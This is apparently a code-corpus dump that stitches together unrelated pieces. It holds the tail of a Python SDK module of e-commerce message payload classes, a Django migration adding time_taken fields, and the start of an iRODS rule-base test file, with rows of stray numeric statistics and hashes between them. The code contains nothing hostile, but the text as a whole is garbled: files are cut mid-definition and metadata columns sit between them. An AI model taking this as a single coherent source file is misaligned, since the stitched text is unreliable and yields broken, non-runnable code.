def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "OrderShippingAddressSetMessagePayload":
from ._schemas.message import OrderShippingAddressSetMessagePayloadSchema
return OrderShippingAddressSetMessagePayloadSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import OrderShippingAddressSetMessagePayloadSchema
return OrderShippingAddressSetMessagePayloadSchema().dump(self)
class OrderShippingInfoSetMessagePayload(MessagePayload):
shipping_info: typing.Optional["ShippingInfo"]
old_shipping_info: typing.Optional["ShippingInfo"]
def __init__(
self,
*,
shipping_info: typing.Optional["ShippingInfo"] = None,
old_shipping_info: typing.Optional["ShippingInfo"] = None
):
self.shipping_info = shipping_info
self.old_shipping_info = old_shipping_info
super().__init__(type="OrderShippingInfoSet")
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "OrderShippingInfoSetMessagePayload":
from ._schemas.message import OrderShippingInfoSetMessagePayloadSchema
return OrderShippingInfoSetMessagePayloadSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import OrderShippingInfoSetMessagePayloadSchema
return OrderShippingInfoSetMessagePayloadSchema().dump(self)
class OrderShippingRateInputSetMessagePayload(MessagePayload):
shipping_rate_input: typing.Optional["ShippingRateInput"]
old_shipping_rate_input: typing.Optional["ShippingRateInput"]
def __init__(
self,
*,
shipping_rate_input: typing.Optional["ShippingRateInput"] = None,
old_shipping_rate_input: typing.Optional["ShippingRateInput"] = None
):
self.shipping_rate_input = shipping_rate_input
self.old_shipping_rate_input = old_shipping_rate_input
super().__init__(type="OrderShippingRateInputSet")
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "OrderShippingRateInputSetMessagePayload":
from ._schemas.message import OrderShippingRateInputSetMessagePayloadSchema
return OrderShippingRateInputSetMessagePayloadSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import OrderShippingRateInputSetMessagePayloadSchema
return OrderShippingRateInputSetMessagePayloadSchema().dump(self)
class OrderStateChangedMessagePayload(MessagePayload):
order_state: "OrderState"
old_order_state: "OrderState"
def __init__(self, *, order_state: "OrderState", old_order_state: "OrderState"):
self.order_state = order_state
self.old_order_state = old_order_state
super().__init__(type="OrderStateChanged")
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "OrderStateChangedMessagePayload":
from ._schemas.message import OrderStateChangedMessagePayloadSchema
return OrderStateChangedMessagePayloadSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import OrderStateChangedMessagePayloadSchema
return OrderStateChangedMessagePayloadSchema().dump(self)
class OrderStateTransitionMessagePayload(MessagePayload):
state: "StateReference"
force: bool
def __init__(self, *, state: "StateReference", force: bool):
self.state = state
self.force = force
super().__init__(type="OrderStateTransition")
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "OrderStateTransitionMessagePayload":
from ._schemas.message import OrderStateTransitionMessagePayloadSchema
return OrderStateTransitionMessagePayloadSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import OrderStateTransitionMessagePayloadSchema
return OrderStateTransitionMessagePayloadSchema().dump(self)
class OrderStoreSetMessagePayload(MessagePayload):
store: "StoreKeyReference"
def __init__(self, *, store: "StoreKeyReference"):
self.store = store
super().__init__(type="OrderStoreSet")
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "OrderStoreSetMessagePayload":
from ._schemas.message import OrderStoreSetMessagePayloadSchema
return OrderStoreSetMessagePayloadSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import OrderStoreSetMessagePayloadSchema
return OrderStoreSetMessagePayloadSchema().dump(self)
class ParcelAddedToDeliveryMessagePayload(MessagePayload):
delivery: "Delivery"
parcel: "Parcel"
def __init__(self, *, delivery: "Delivery", parcel: "Parcel"):
self.delivery = delivery
self.parcel = parcel
super().__init__(type="ParcelAddedToDelivery")
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "ParcelAddedToDeliveryMessagePayload":
from ._schemas.message import ParcelAddedToDeliveryMessagePayloadSchema
return ParcelAddedToDeliveryMessagePayloadSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import ParcelAddedToDeliveryMessagePayloadSchema
return ParcelAddedToDeliveryMessagePayloadSchema().dump(self)
class ParcelItemsUpdatedMessagePayload(MessagePayload):
parcel_id: str
delivery_id: typing.Optional[str]
items: typing.List["DeliveryItem"]
old_items: typing.List["DeliveryItem"]
def __init__(
self,
*,
parcel_id: str,
delivery_id: typing.Optional[str] = None,
items: typing.List["DeliveryItem"],
old_items: typing.List["DeliveryItem"]
):
self.parcel_id = parcel_id
self.delivery_id = delivery_id
self.items = items
self.old_items = old_items
super().__init__(type="ParcelItemsUpdated")
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "ParcelItemsUpdatedMessagePayload":
from ._schemas.message import ParcelItemsUpdatedMessagePayloadSchema
return ParcelItemsUpdatedMessagePayloadSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import ParcelItemsUpdatedMessagePayloadSchema
return ParcelItemsUpdatedMessagePayloadSchema().dump(self)
class ParcelMeasurementsUpdatedMessagePayload(MessagePayload):
delivery_id: str
parcel_id: str
measurements: typing.Optional["ParcelMeasurements"]
def __init__(
self,
*,
delivery_id: str,
parcel_id: str,
measurements: typing.Optional["ParcelMeasurements"] = None
):
self.delivery_id = delivery_id
self.parcel_id = parcel_id
self.measurements = measurements
super().__init__(type="ParcelMeasurementsUpdated")
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "ParcelMeasurementsUpdatedMessagePayload":
from ._schemas.message import ParcelMeasurementsUpdatedMessagePayloadSchema
return ParcelMeasurementsUpdatedMessagePayloadSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import ParcelMeasurementsUpdatedMessagePayloadSchema
return ParcelMeasurementsUpdatedMessagePayloadSchema().dump(self)
class ParcelRemovedFromDeliveryMessagePayload(MessagePayload):
delivery_id: str
parcel: "Parcel"
def __init__(self, *, delivery_id: str, parcel: "Parcel"):
self.delivery_id = delivery_id
self.parcel = parcel
super().__init__(type="ParcelRemovedFromDelivery")
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "ParcelRemovedFromDeliveryMessagePayload":
from ._schemas.message import ParcelRemovedFromDeliveryMessagePayloadSchema
return ParcelRemovedFromDeliveryMessagePayloadSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import ParcelRemovedFromDeliveryMessagePayloadSchema
return ParcelRemovedFromDeliveryMessagePayloadSchema().dump(self)
class ParcelTrackingDataUpdatedMessagePayload(MessagePayload):
delivery_id: str
parcel_id: str
tracking_data: typing.Optional["TrackingData"]
def __init__(
self,
*,
delivery_id: str,
parcel_id: str,
tracking_data: typing.Optional["TrackingData"] = None
):
self.delivery_id = delivery_id
self.parcel_id = parcel_id
self.tracking_data = tracking_data
super().__init__(type="ParcelTrackingDataUpdated")
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "ParcelTrackingDataUpdatedMessagePayload":
from ._schemas.message import ParcelTrackingDataUpdatedMessagePayloadSchema
return ParcelTrackingDataUpdatedMessagePayloadSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import ParcelTrackingDataUpdatedMessagePayloadSchema
return ParcelTrackingDataUpdatedMessagePayloadSchema().dump(self)
class PaymentCreatedMessagePayload(MessagePayload):
payment: "Payment"
def __init__(self, *, payment: "Payment"):
self.payment = payment
super().__init__(type="PaymentCreated")
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "PaymentCreatedMessagePayload":
from ._schemas.message import PaymentCreatedMessagePayloadSchema
return PaymentCreatedMessagePayloadSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import PaymentCreatedMessagePayloadSchema
return PaymentCreatedMessagePayloadSchema().dump(self)
class PaymentInteractionAddedMessagePayload(MessagePayload):
interaction: "CustomFields"
def __init__(self, *, interaction: "CustomFields"):
self.interaction = interaction
super().__init__(type="PaymentInteractionAdded")
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "PaymentInteractionAddedMessagePayload":
from ._schemas.message import PaymentInteractionAddedMessagePayloadSchema
return PaymentInteractionAddedMessagePayloadSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import PaymentInteractionAddedMessagePayloadSchema
return PaymentInteractionAddedMessagePayloadSchema().dump(self)
class PaymentStatusInterfaceCodeSetMessagePayload(MessagePayload):
payment_id: str
interface_code: str
def __init__(self, *, payment_id: str, interface_code: str):
self.payment_id = payment_id
self.interface_code = interface_code
super().__init__(type="PaymentStatusInterfaceCodeSet")
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "PaymentStatusInterfaceCodeSetMessagePayload":
from ._schemas.message import PaymentStatusInterfaceCodeSetMessagePayloadSchema
return PaymentStatusInterfaceCodeSetMessagePayloadSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import PaymentStatusInterfaceCodeSetMessagePayloadSchema
return PaymentStatusInterfaceCodeSetMessagePayloadSchema().dump(self)
class PaymentStatusStateTransitionMessagePayload(MessagePayload):
state: "StateReference"
force: bool
def __init__(self, *, state: "StateReference", force: bool):
self.state = state
self.force = force
super().__init__(type="PaymentStatusStateTransition")
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "PaymentStatusStateTransitionMessagePayload":
from ._schemas.message import PaymentStatusStateTransitionMessagePayloadSchema
return PaymentStatusStateTransitionMessagePayloadSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import PaymentStatusStateTransitionMessagePayloadSchema
return PaymentStatusStateTransitionMessagePayloadSchema().dump(self)
class PaymentTransactionAddedMessagePayload(MessagePayload):
transaction: "Transaction"
def __init__(self, *, transaction: "Transaction"):
self.transaction = transaction
super().__init__(type="PaymentTransactionAdded")
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "PaymentTransactionAddedMessagePayload":
from ._schemas.message import PaymentTransactionAddedMessagePayloadSchema
return PaymentTransactionAddedMessagePayloadSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import PaymentTransactionAddedMessagePayloadSchema
return PaymentTransactionAddedMessagePayloadSchema().dump(self)
class PaymentTransactionStateChangedMessagePayload(MessagePayload):
transaction_id: str
state: "TransactionState"
def __init__(self, *, transaction_id: str, state: "TransactionState"):
self.transaction_id = transaction_id
self.state = state
super().__init__(type="PaymentTransactionStateChanged")
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "PaymentTransactionStateChangedMessagePayload":
from ._schemas.message import PaymentTransactionStateChangedMessagePayloadSchema
return PaymentTransactionStateChangedMessagePayloadSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import PaymentTransactionStateChangedMessagePayloadSchema
return PaymentTransactionStateChangedMessagePayloadSchema().dump(self)
class ProductAddedToCategoryMessagePayload(MessagePayload):
category: "CategoryReference"
staged: bool
def __init__(self, *, category: "CategoryReference", staged: bool):
self.category = category
self.staged = staged
super().__init__(type="ProductAddedToCategory")
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "ProductAddedToCategoryMessagePayload":
from ._schemas.message import ProductAddedToCategoryMessagePayloadSchema
return ProductAddedToCategoryMessagePayloadSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import ProductAddedToCategoryMessagePayloadSchema
return ProductAddedToCategoryMessagePayloadSchema().dump(self)
class ProductCreatedMessagePayload(MessagePayload):
product_projection: "ProductProjection"
def __init__(self, *, product_projection: "ProductProjection"):
self.product_projection = product_projection
super().__init__(type="ProductCreated")
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "ProductCreatedMessagePayload":
from ._schemas.message import ProductCreatedMessagePayloadSchema
return ProductCreatedMessagePayloadSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import ProductCreatedMessagePayloadSchema
return ProductCreatedMessagePayloadSchema().dump(self)
class ProductDeletedMessagePayload(MessagePayload):
removed_image_urls: typing.List["str"]
current_projection: "ProductProjection"
def __init__(
self,
*,
removed_image_urls: typing.List["str"],
current_projection: "ProductProjection"
):
self.removed_image_urls = removed_image_urls
self.current_projection = current_projection
super().__init__(type="ProductDeleted")
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "ProductDeletedMessagePayload":
from ._schemas.message import ProductDeletedMessagePayloadSchema
return ProductDeletedMessagePayloadSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import ProductDeletedMessagePayloadSchema
return ProductDeletedMessagePayloadSchema().dump(self)
class ProductImageAddedMessagePayload(MessagePayload):
variant_id: int
image: "Image"
staged: bool
def __init__(self, *, variant_id: int, image: "Image", staged: bool):
self.variant_id = variant_id
self.image = image
self.staged = staged
super().__init__(type="ProductImageAdded")
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "ProductImageAddedMessagePayload":
from ._schemas.message import ProductImageAddedMessagePayloadSchema
return ProductImageAddedMessagePayloadSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import ProductImageAddedMessagePayloadSchema
return ProductImageAddedMessagePayloadSchema().dump(self)
class ProductPriceDiscountsSetMessagePayload(MessagePayload):
updated_prices: typing.List["ProductPriceDiscountsSetUpdatedPrice"]
def __init__(
self, *, updated_prices: typing.List["ProductPriceDiscountsSetUpdatedPrice"]
):
self.updated_prices = updated_prices
super().__init__(type="ProductPriceDiscountsSet")
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "ProductPriceDiscountsSetMessagePayload":
from ._schemas.message import ProductPriceDiscountsSetMessagePayloadSchema
return ProductPriceDiscountsSetMessagePayloadSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import ProductPriceDiscountsSetMessagePayloadSchema
return ProductPriceDiscountsSetMessagePayloadSchema().dump(self)
class ProductPriceExternalDiscountSetMessagePayload(MessagePayload):
variant_id: int
variant_key: typing.Optional[str]
sku: typing.Optional[str]
price_id: str
discounted: typing.Optional["DiscountedPrice"]
staged: bool
def __init__(
self,
*,
variant_id: int,
variant_key: typing.Optional[str] = None,
sku: typing.Optional[str] = None,
price_id: str,
discounted: typing.Optional["DiscountedPrice"] = None,
staged: bool
):
self.variant_id = variant_id
self.variant_key = variant_key
self.sku = sku
self.price_id = price_id
self.discounted = discounted
self.staged = staged
super().__init__(type="ProductPriceExternalDiscountSet")
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "ProductPriceExternalDiscountSetMessagePayload":
from ._schemas.message import (
ProductPriceExternalDiscountSetMessagePayloadSchema,
)
return ProductPriceExternalDiscountSetMessagePayloadSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import (
ProductPriceExternalDiscountSetMessagePayloadSchema,
)
return ProductPriceExternalDiscountSetMessagePayloadSchema().dump(self)
class ProductPublishedMessagePayload(MessagePayload):
removed_image_urls: typing.List["str"]
product_projection: "ProductProjection"
scope: "ProductPublishScope"
def __init__(
self,
*,
removed_image_urls: typing.List["str"],
product_projection: "ProductProjection",
scope: "ProductPublishScope"
):
self.removed_image_urls = removed_image_urls
self.product_projection = product_projection
self.scope = scope
super().__init__(type="ProductPublished")
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "ProductPublishedMessagePayload":
from ._schemas.message import ProductPublishedMessagePayloadSchema
return ProductPublishedMessagePayloadSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import ProductPublishedMessagePayloadSchema
return ProductPublishedMessagePayloadSchema().dump(self)
class ProductRemovedFromCategoryMessagePayload(MessagePayload):
category: "CategoryReference"
staged: bool
def __init__(self, *, category: "CategoryReference", staged: bool):
self.category = category
self.staged = staged
super().__init__(type="ProductRemovedFromCategory")
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "ProductRemovedFromCategoryMessagePayload":
from ._schemas.message import ProductRemovedFromCategoryMessagePayloadSchema
return ProductRemovedFromCategoryMessagePayloadSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import ProductRemovedFromCategoryMessagePayloadSchema
return ProductRemovedFromCategoryMessagePayloadSchema().dump(self)
class ProductRevertedStagedChangesMessagePayload(MessagePayload):
removed_image_urls: typing.List["str"]
def __init__(self, *, removed_image_urls: typing.List["str"]):
self.removed_image_urls = removed_image_urls
super().__init__(type="ProductRevertedStagedChanges")
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "ProductRevertedStagedChangesMessagePayload":
from ._schemas.message import ProductRevertedStagedChangesMessagePayloadSchema
return ProductRevertedStagedChangesMessagePayloadSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import ProductRevertedStagedChangesMessagePayloadSchema
return ProductRevertedStagedChangesMessagePayloadSchema().dump(self)
class ProductSlugChangedMessagePayload(MessagePayload):
slug: "LocalizedString"
old_slug: typing.Optional["LocalizedString"]
def __init__(
self,
*,
slug: "LocalizedString",
old_slug: typing.Optional["LocalizedString"] = None
):
self.slug = slug
self.old_slug = old_slug
super().__init__(type="ProductSlugChanged")
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "ProductSlugChangedMessagePayload":
from ._schemas.message import ProductSlugChangedMessagePayloadSchema
return ProductSlugChangedMessagePayloadSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import ProductSlugChangedMessagePayloadSchema
return ProductSlugChangedMessagePayloadSchema().dump(self)
class ProductStateTransitionMessagePayload(MessagePayload):
state: "StateReference"
force: bool
def __init__(self, *, state: "StateReference", force: bool):
self.state = state
self.force = force
super().__init__(type="ProductStateTransition")
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "ProductStateTransitionMessagePayload":
from ._schemas.message import ProductStateTransitionMessagePayloadSchema
return ProductStateTransitionMessagePayloadSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import ProductStateTransitionMessagePayloadSchema
return ProductStateTransitionMessagePayloadSchema().dump(self)
class ProductUnpublishedMessagePayload(MessagePayload):
def __init__(self):
super().__init__(type="ProductUnpublished")
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "ProductUnpublishedMessagePayload":
from ._schemas.message import ProductUnpublishedMessagePayloadSchema
return ProductUnpublishedMessagePayloadSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import ProductUnpublishedMessagePayloadSchema
return ProductUnpublishedMessagePayloadSchema().dump(self)
class ProductVariantAddedMessagePayload(MessagePayload):
variant: "ProductVariant"
staged: bool
def __init__(self, *, variant: "ProductVariant", staged: bool):
self.variant = variant
self.staged = staged
super().__init__(type="ProductVariantAdded")
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "ProductVariantAddedMessagePayload":
from ._schemas.message import ProductVariantAddedMessagePayloadSchema
return ProductVariantAddedMessagePayloadSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import ProductVariantAddedMessagePayloadSchema
return ProductVariantAddedMessagePayloadSchema().dump(self)
class ProductVariantDeletedMessagePayload(MessagePayload):
variant: "ProductVariant"
removed_image_urls: typing.List["str"]
def __init__(
self, *, variant: "ProductVariant", removed_image_urls: typing.List["str"]
):
self.variant = variant
self.removed_image_urls = removed_image_urls
super().__init__(type="ProductVariantDeleted")
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "ProductVariantDeletedMessagePayload":
from ._schemas.message import ProductVariantDeletedMessagePayloadSchema
return ProductVariantDeletedMessagePayloadSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import ProductVariantDeletedMessagePayloadSchema
return ProductVariantDeletedMessagePayloadSchema().dump(self)
class ReviewCreatedMessagePayload(MessagePayload):
review: "Review"
def __init__(self, *, review: "Review"):
self.review = review
super().__init__(type="ReviewCreated")
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "ReviewCreatedMessagePayload":
from ._schemas.message import ReviewCreatedMessagePayloadSchema
return ReviewCreatedMessagePayloadSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import ReviewCreatedMessagePayloadSchema
return ReviewCreatedMessagePayloadSchema().dump(self)
class ReviewRatingSetMessagePayload(MessagePayload):
old_rating: typing.Optional[float]
new_rating: typing.Optional[float]
included_in_statistics: bool
target: typing.Optional["Reference"]
def __init__(
self,
*,
old_rating: typing.Optional[float] = None,
new_rating: typing.Optional[float] = None,
included_in_statistics: bool,
target: typing.Optional["Reference"] = None
):
self.old_rating = old_rating
self.new_rating = new_rating
self.included_in_statistics = included_in_statistics
self.target = target
super().__init__(type="ReviewRatingSet")
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "ReviewRatingSetMessagePayload":
from ._schemas.message import ReviewRatingSetMessagePayloadSchema
return ReviewRatingSetMessagePayloadSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import ReviewRatingSetMessagePayloadSchema
return ReviewRatingSetMessagePayloadSchema().dump(self)
class ReviewStateTransitionMessagePayload(MessagePayload):
old_state: "StateReference"
new_state: "StateReference"
old_included_in_statistics: bool
new_included_in_statistics: bool
target: "Reference"
force: bool
def __init__(
self,
*,
old_state: "StateReference",
new_state: "StateReference",
old_included_in_statistics: bool,
new_included_in_statistics: bool,
target: "Reference",
force: bool
):
self.old_state = old_state
self.new_state = new_state
self.old_included_in_statistics = old_included_in_statistics
self.new_included_in_statistics = new_included_in_statistics
self.target = target
self.force = force
super().__init__(type="ReviewStateTransition")
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "ReviewStateTransitionMessagePayload":
from ._schemas.message import ReviewStateTransitionMessagePayloadSchema
return ReviewStateTransitionMessagePayloadSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import ReviewStateTransitionMessagePayloadSchema
return ReviewStateTransitionMessagePayloadSchema().dump(self)
class ShoppingListStoreSetMessagePayload(MessagePayload):
store: "StoreKeyReference"
def __init__(self, *, store: "StoreKeyReference"):
self.store = store
super().__init__(type="ShoppingListStoreSet")
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "ShoppingListStoreSetMessagePayload":
from ._schemas.message import ShoppingListStoreSetMessagePayloadSchema
return ShoppingListStoreSetMessagePayloadSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import ShoppingListStoreSetMessagePayloadSchema
return ShoppingListStoreSetMessagePayloadSchema().dump(self)
| 35.119186
| 88
| 0.683133
| 19,518
| 236,317
| 8.00456
| 0.030177
| 0.031895
| 0.052191
| 0.069588
| 0.877971
| 0.874175
| 0.87102
| 0.782223
| 0.778241
| 0.604258
| 0
| 0
| 0.235853
| 236,317
| 6,728
| 89
| 35.124405
| 0.865169
| 0.001968
| 0
| 0.817404
| 1
| 0
| 0.107864
| 0.067761
| 0
| 0
| 0
| 0
| 0
| 1
| 0.084107
| false
| 0.004005
| 0.089751
| 0
| 0.343528
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
536618c76864a4f1142321161ed15d0dfc8b1fcd
| 2,029
|
py
|
Python
|
Questionnaire/migrations/0003_auto_20200720_1101.py
|
AdityaKapoor74/Supervised_Categorization_Study
|
1ce29de95c8ccc2b848e2d06463719858e57b942
|
[
"MIT"
] | null | null | null |
Questionnaire/migrations/0003_auto_20200720_1101.py
|
AdityaKapoor74/Supervised_Categorization_Study
|
1ce29de95c8ccc2b848e2d06463719858e57b942
|
[
"MIT"
] | null | null | null |
Questionnaire/migrations/0003_auto_20200720_1101.py
|
AdityaKapoor74/Supervised_Categorization_Study
|
1ce29de95c8ccc2b848e2d06463719858e57b942
|
[
"MIT"
] | null | null | null |
# Generated by Django 2.0.2 on 2020-07-20 11:01
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('Questionnaire', '0002_auto_20200720_1100'),
]
operations = [
migrations.AddField(
model_name='userresponse_common_features_test_set1',
name='time_taken',
field=models.FloatField(default=None),
),
migrations.AddField(
model_name='userresponse_common_features_test_set2',
name='time_taken',
field=models.FloatField(default=None),
),
migrations.AddField(
model_name='userresponse_common_features_test_set3',
name='time_taken',
field=models.FloatField(default=None),
),
migrations.AddField(
model_name='userresponse_common_features_test_set4',
name='time_taken',
field=models.FloatField(default=None),
),
migrations.AddField(
model_name='userresponse_common_features_test_set5',
name='time_taken',
field=models.FloatField(default=None),
),
migrations.AddField(
model_name='userresponse_test_set1',
name='time_taken',
field=models.FloatField(default=None),
),
migrations.AddField(
model_name='userresponse_test_set2',
name='time_taken',
field=models.FloatField(default=None),
),
migrations.AddField(
model_name='userresponse_test_set3',
name='time_taken',
field=models.FloatField(default=None),
),
migrations.AddField(
model_name='userresponse_test_set4',
name='time_taken',
field=models.FloatField(default=None),
),
migrations.AddField(
model_name='userresponse_test_set5',
name='time_taken',
field=models.FloatField(default=None),
),
]
| 31.703125
| 64
| 0.590931
| 189
| 2,029
| 6.063492
| 0.227513
| 0.157068
| 0.200698
| 0.235602
| 0.863874
| 0.863874
| 0.863874
| 0.863874
| 0.817627
| 0.817627
| 0
| 0.029181
| 0.307541
| 2,029
| 63
| 65
| 32.206349
| 0.786477
| 0.022178
| 0
| 0.701754
| 1
| 0
| 0.21998
| 0.162967
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.017544
| 0
| 0.070175
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
725b0ca5d88de89509a5bd2013a87016acb69d10
| 46,283
|
py
|
Python
|
tests/pydevtest/test_rulebase.py
|
iychoi/cyverse-irods
|
0070b8677a82e763f1d940ae6537b1c8839a628a
|
[
"BSD-3-Clause"
] | null | null | null |
tests/pydevtest/test_rulebase.py
|
iychoi/cyverse-irods
|
0070b8677a82e763f1d940ae6537b1c8839a628a
|
[
"BSD-3-Clause"
] | 6
|
2019-12-02T18:17:44.000Z
|
2019-12-02T18:17:57.000Z
|
tests/pydevtest/test_rulebase.py
|
benlazarine/cyverse-irods
|
2bf9cfae4c3a1062ffe2af92b1f086ddc5fce025
|
[
"BSD-3-Clause"
] | 1
|
2019-12-02T05:40:13.000Z
|
2019-12-02T05:40:13.000Z
|
import sys
if sys.version_info >= (2, 7):
import unittest
else:
import unittest2 as unittest
import os
import socket
import time # remove once file hash fix is commited #2279
import lib
import time
import copy
import inspect
import configuration
from resource_suite import ResourceBase
class Test_Rulebase(ResourceBase, unittest.TestCase):
def setUp(self):
super(Test_Rulebase, self).setUp()
def tearDown(self):
super(Test_Rulebase, self).tearDown()
def test_client_server_negotiation__2564(self):
corefile = lib.get_core_re_dir() + "/core.re"
with lib.file_backed_up(corefile):
client_update = {
'irods_client_server_policy': 'CS_NEG_REFUSE'
}
session_env_backup = copy.deepcopy(self.admin.environment_file_contents)
self.admin.environment_file_contents.update(client_update)
time.sleep(2) # remove once file hash fix is commited #2279
lib.prepend_string_to_file('\nacPreConnect(*OUT) { *OUT="CS_NEG_REQUIRE"; }\n', corefile)
time.sleep(2) # remove once file hash fix is commited #2279
self.admin.assert_icommand( 'ils','STDERR_SINGLELINE','CLIENT_NEGOTIATION_ERROR')
self.admin.environment_file_contents = session_env_backup
def test_msiDataObjWrite__2795(self):
rule_file = "test_rule_file.r"
rule_string = """
test_msiDataObjWrite__2795 {
### write a string to a file in irods
msiDataObjCreate("*TEST_ROOT" ++ "/test_file.txt","null",*FD);
msiDataObjWrite(*FD,"this_is_a_test_string",*LEN);
msiDataObjClose(*FD,*Status);
}
INPUT *TEST_ROOT=\""""+self.admin.session_collection+"""\"
OUTPUT ruleExecOut
"""
with open(rule_file, 'w') as f:
f.write(rule_string)
test_file = self.admin.session_collection+'/test_file.txt'
self.admin.assert_icommand('irule -F ' + rule_file)
self.admin.assert_icommand('ils -l','STDOUT_SINGLELINE','test_file')
self.admin.assert_icommand('iget -f '+test_file)
with open("test_file.txt", 'r') as f:
file_contents = f.read()
assert( not file_contents.endswith('\0') )
def test_acPostProcForPut_replicate_to_multiple_resources(self):
# create new resources
hostname = socket.gethostname()
self.admin.assert_icommand("iadmin mkresc r1 unixfilesystem " + hostname + ":/tmp/irods/r1", 'STDOUT_SINGLELINE', "Creating")
self.admin.assert_icommand("iadmin mkresc r2 unixfilesystem " + hostname + ":/tmp/irods/r2", 'STDOUT_SINGLELINE', "Creating")
corefile = os.path.join(lib.get_core_re_dir(), 'core.re')
with lib.file_backed_up(corefile):
time.sleep(2) # remove once file hash fix is commited #2279
